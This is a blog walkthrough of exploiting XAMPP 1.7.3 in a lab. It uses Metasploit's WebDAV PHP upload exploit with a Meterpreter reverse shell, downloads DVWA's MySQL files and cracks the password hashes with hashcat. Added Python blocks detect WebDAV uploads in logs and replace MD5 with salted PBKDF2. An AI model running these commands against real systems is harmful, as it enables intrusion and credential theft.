XAMPP 1.7.3 Exploitation | SupraFortix Blog

https://suprafortix.wordpress.com/2014/04/17/exploiting-xampp-v1-7-3/

SupraFortix Blog
"The Internet is becoming the town square for the global village of tomorrow."
(https://suprafortix.wordpress.com/)


XAMPP 1.7.3 Exploitation


POSTED ON APRIL 17, 2014, UPDATED ON JULY 11, 2014

In this post I'm going to concentrate on exploiting an older version
of XAMPP server, as well as stealing usernames and passwords
from the MySQL database tables of a particular website (DVWA)
using the XAMPP vulnerability. The hacking tools used in this
example are Metasploit's msfconsole with a Meterpreter payload
and the HashCat hash-cracking tool. The operating systems
used are Windows XP SP3 (Firewall ON) for the victim and Kali
Linux for the attacker.

XAMPP SETUP
On the victim's machine, start all available server modules:
Apache, MySQL, FileZilla, Mercury.

(https://suprafortix.files.wordpress.com/2014/04/xampp-setuparr.png)

SCANNING THE VICTIM
The next step is finding out what type of software the victim
runs, as we don't know that at the beginning of the hack. Open up
a terminal window in Kali and conduct an Nmap version scan with the
following command. In this case 192.168.1.7 is the victim's IP
address.

nmap -sV 192.168.1.7

When the scan returns some data, we can see the server services
running on the victim and the open ports they are
communicating on. However, it's still not clear what type of
server it is. A quick Google search of these services will reveal that
the victim is running XAMPP 1.7.3.

(https://suprafortix.files.wordpress.com/2014/04/nmap-scan.png)
Services Turned On
Apache httpd 2.2.14
DAV/2
mod_ssl/2.2.14 OpenSSL/0.9.8l
mod_autoindex_color PHP/5.3.1
mod_apreq2-20090110/2.7.1
mod_perl/2.0.4 Perl/v5.10.1

XAMPP HACKING
Open another terminal window, fire up msfconsole, wait
until it loads, and search the Metasploit database for XAMPP
vulnerabilities.

msfconsole - starts msfconsole
search xampp - searches for XAMPP vulnerabilities

(https://suprafortix.files.wordpress.com/2014/04/xamppsearch.png)
An exploit shows up with a disclosure date of 14/01/2012. This is
perfect, as XAMPP 1.7.3 was released on 23/12/2009, so the
vulnerability will still be exploitable.


use exploit/windows/http/xampp_webdav_upload_php

Now search for and choose an appropriate payload for this hack. In this
example the payload will open a Meterpreter terminal session,
which allows the attacker to view, download and modify files and
directories on the victim's computer.

show payloads - shows all available payloads
set payload php/meterpreter/reverse_tcp - sets a particular payload

(https://suprafortix.files.wordpress.com/2014/04/selectpayload.png)
Now we need to look at the options that must be set to
successfully execute the hack.

show options - shows required and non-required options to set up

We can see that some required rows such as LHOST (local host,
the attacker) and RHOST (remote host, the victim) are empty, while other
required options such as PATH and RPORT are already filled in by
default.

(https://suprafortix.files.wordpress.com/2014/04/show-optionsarr1.png)

set rhost 192.168.1.7 - sets the target address
set lhost 192.168.1.9 - sets the listen address

The exploit and the payload now have all the necessary
information to conduct the attack.

exploit - attempts to exploit the target IP address

If the attack is successful, a Meterpreter command prompt will be
displayed on screen.

(https://suprafortix.files.wordpress.com/2014/04/meterpretercommand-prompt.png)
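Seen from the server side, the upload performed by the xampp_webdav_upload_php module leaves WebDAV write requests in Apache's access log. The following is an added example, not part of the original post: it flags such writes and raises the severity when the same client then requests the script it uploaded. The log lines are constructed, and the /webdav/ URL prefix and the function name find_dav_uploads are assumptions.

```python
import re

# Apache access log: host ident user [time] "METHOD path proto" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) ')
WRITE_METHODS = {"PUT", "MOVE", "COPY", "MKCOL", "PROPPATCH", "DELETE"}
SCRIPT_EXT = (".php", ".php3", ".php5", ".phtml", ".pl", ".cgi")
DAV_PREFIX = "/webdav/"  # assumption: URL path served from the XAMPP webdav directory

# Constructed sample lines (not taken from the original post).
SAMPLE_LOG = """\
192.168.1.20 - - [17/Apr/2014:10:01:02 +0100] "GET /dvwa/login.php HTTP/1.1" 200 1523
192.168.1.9 - davuser [17/Apr/2014:10:05:40 +0100] "PUT /webdav/a1b2c3.php HTTP/1.1" 201 312
192.168.1.9 - - [17/Apr/2014:10:05:41 +0100] "GET /webdav/a1b2c3.php HTTP/1.1" 200 -
192.168.1.30 - davuser [17/Apr/2014:10:07:00 +0100] "PUT /webdav/notes.txt HTTP/1.1" 201 120
192.168.1.9 - davuser [17/Apr/2014:10:08:00 +0100] "PUT /webdav/x.php HTTP/1.1" 401 401
"""

def find_dav_uploads(log_text):
    """Return one finding per WebDAV write under DAV_PREFIX.

    low    = any write (including rejected ones and non-script files)
    medium = a script file was accepted (2xx)
    high   = the same client later fetched that script (upload, then execute)
    """
    findings, uploaded = [], {}
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m or not m["path"].lower().startswith(DAV_PREFIX):
            continue
        path = m["path"].split("?", 1)[0]
        key = (m["ip"], path)
        accepted = m["status"].startswith("2")
        if m["method"] in WRITE_METHODS:
            is_script = path.lower().endswith(SCRIPT_EXT)
            finding = {"ip": m["ip"], "method": m["method"], "path": path,
                       "status": int(m["status"]),
                       "severity": "medium" if accepted and is_script else "low"}
            findings.append(finding)
            if accepted and is_script:
                uploaded[key] = finding
        elif m["method"] in ("GET", "POST") and accepted and key in uploaded:
            uploaded[key]["severity"] = "high"
    return findings
```
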
If the pwd (present working directory) command is executed, you can
see that the Meterpreter session has been opened in the C:\xampp\webdav
directory. The database files of the desired website are
not located in this directory, therefore we need to search for them in
the C:\xampp directory.

cd .. - moves to C:\xampp directory
ls - shows the content of C:\xampp directory

(https://suprafortix.files.wordpress.com/2014/04/mysqlnd-arr.png)
A directory named mysql is located in C:\xampp\, let's see what's
inside.

cd mysql - moves to C:\xampp\mysql\
cd data - moves to C:\xampp\mysql\data\
cd dvwa - moves to C:\xampp\mysql\data\dvwa\
ls - shows the contents of C:\xampp\mysql\data\dvwa\

I knew where the desired directory is located; you'd ls every
time you move into a new directory to view the content.
The directory shows .MYD and .MYI file types, which are MySQL
database files.

(https://suprafortix.files.wordpress.com/2014/04/dvwa-dir.png)
To download all database files, the session needs to move out
of the dvwa directory into the data directory, from where the whole
database directory can be downloaded onto the attacker machine.

cd .. - moves to C:\xampp\mysql\data\
download dvwa - downloads the dvwa directory where the database files are hidden

(https://suprafortix.files.wordpress.com/2014/04/downloading.png)
The whole source code of the website and other system files or
directories can be downloaded, modified or deleted, or even new
files uploaded; however, that's beyond the scope of this post.

PASSWORD CRACKING
The downloaded database directory will be located by default in the
/root/ directory on the attacker's machine. Open up another
terminal window and go to the downloaded database directory.
The hashed passwords, usernames and file paths to user pictures
are located in the users.MYD file.

cat users.MYD - shows the contents of the users.MYD file

(https://suprafortix.files.wordpress.com/2014/04/users-myd- learr.png)

Extract the stolen hashes to a text file and save it as
stolenhashes.txt in the /root/ directory.

(https://suprafortix.files.wordpress.com/2014/04/stolenhashes.png)
The tool that is used to crack the hashes in this example is
HashCat with the RockYou hash dictionary, located in
/root/Desktop.

hashcat -m 0 -a 0 /root/stolenhashes.txt /root/Desktop/rockyou.txt - will attempt to find the given hashes in the rockyou.txt dictionary

(https://suprafortix.files.wordpress.com/2014/04/crackedpasswords-arr.png)

HashCat successfully cracked all of the hashes. The attacker now
tries to log in with the username and the corresponding cracked
password.

(https://suprafortix.files.wordpress.com/2014/04/dvwa-loginpage.png)
SUCCESS!! The attacker now has complete control over the
administrator account.

(https://suprafortix.files.wordpress.com/2014/04/dvwa-loginpage-in.png)
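The dictionary run above recovers every password because hashcat mode 0 targets plain, unsalted MD5, which is fast to compute and gives the same digest for the same password in every account. The following is an added example, not code from the original post or from DVWA: it puts that legacy format beside a salted PBKDF2 record, audits a user table for legacy entries and upgrades a record at the next successful login. The sample table, the record layout, the iteration count and all function names are assumptions.

```python
import hashlib
import hmac
import os
import re

ITERATIONS = 600_000                      # assumption: PBKDF2-HMAC-SHA256 work factor
LEGACY_MD5 = re.compile(r"[0-9a-f]{32}")  # bare 32-hex digest, the format hashcat -m 0 targets

def md5_store(password):
    """Legacy scheme: unsalted and fast; equal passwords give equal hashes."""
    return hashlib.md5(password.encode()).hexdigest()

def pbkdf2_store(password, salt=None, iterations=ITERATIONS):
    """Hardened scheme: per-user random salt plus a deliberately slow KDF."""
    salt = salt if salt is not None else os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return f"pbkdf2_sha256${iterations}${salt.hex()}${dk.hex()}"

def verify(password, stored):
    """Check a login attempt against either record format, in constant time."""
    if LEGACY_MD5.fullmatch(stored):
        return hmac.compare_digest(md5_store(password), stored)
    _, iterations, salt_hex, dk_hex = stored.split("$")
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(),
                             bytes.fromhex(salt_hex), int(iterations))
    return hmac.compare_digest(dk.hex(), dk_hex)

def upgrade_on_login(password, stored):
    """After a successful login, return a PBKDF2 record to replace a legacy one."""
    if not verify(password, stored):
        return None                       # wrong password: nothing to upgrade
    return pbkdf2_store(password) if LEGACY_MD5.fullmatch(stored) else stored

def audit(users):
    """List accounts still stored as bare MD5, i.e. exposed to a dictionary run."""
    return sorted(name for name, stored in users.items()
                  if LEGACY_MD5.fullmatch(stored))

# Constructed sample table (not the data from the post); both users chose "password".
USERS = {"alice": md5_store("password"), "bob": md5_store("password")}
```
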

This entry was posted in Exploitation and tagged dvwa, exploit,
exploit/windows/http/xampp_webdav_upload_php, hacking, hash cracking,
hashcat, metasploit, msfconsole, unauthorised access, webdav,
XAMPP 1.7.3.
